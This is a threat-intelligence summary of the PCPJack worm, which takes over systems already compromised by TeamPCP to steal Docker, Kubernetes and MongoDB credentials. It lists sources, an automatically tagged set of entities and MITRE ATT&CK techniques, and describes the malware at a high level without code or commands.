PCPJack Worm Targets TeamPCP Infections for Credential Theft

Severity: High (Score: 70.2)

Sources: www.sentinelone.com, Techcrunch, arstechnica.com, Bleepingcomputer

Summary

A new malware framework named PCPJack has emerged, targeting systems previously compromised by the TeamPCP cybercrime group. This worm steals credentials from cloud services like Docker, Kubernetes, and MongoDB, while simultaneously removing TeamPCP's access. The malware is believed to be operated by either ex-TeamPCP members or a rival group, focusing on financial gain through credential resale and extortion. PCPJack operates by scanning for exposed services and exploiting known vulnerabilities. It uses a shell script to establish persistence and exfiltrates stolen data to Telegram channels. SentinelLabs researchers have noted that the malware's capabilities closely resemble earlier TeamPCP campaigns. The current status of the threat is active, with ongoing credential theft and lateral movement within compromised networks. Key Points: • PCPJack targets cloud infrastructure previously compromised by TeamPCP. • The malware employs credential theft techniques and removes TeamPCP's access to systems. • Current operations focus on financial gain through credential resale and extortion.

Key Entities

• Data Breach (attack_type)
• Malware (attack_type)
• Phishing (attack_type)
• Worm (attack_type)
• PCPJack (campaign)
• Anthropic (company)
• Aqua Security (company)
• DigitalOcean (company)
• European Commission (company)
• Mercor (company)
• Discord (platform)
• Kubernetes (platform)
• Linux (platform)
• MongoDB (platform)
• RayML (platform)
• LiteLLM (tool)
• Docker (tool)
• Financial (industry)
• T1003 - OS Credential Dumping (mitre_attack)
• T1021 - Remote Services (mitre_attack)
• T1041 - Exfiltration Over C2 Channel (mitre_attack)
• T1053 - Scheduled Task/Job (mitre_attack)
• T1059.004 - Unix Shell (mitre_attack)
• Sliver (malware)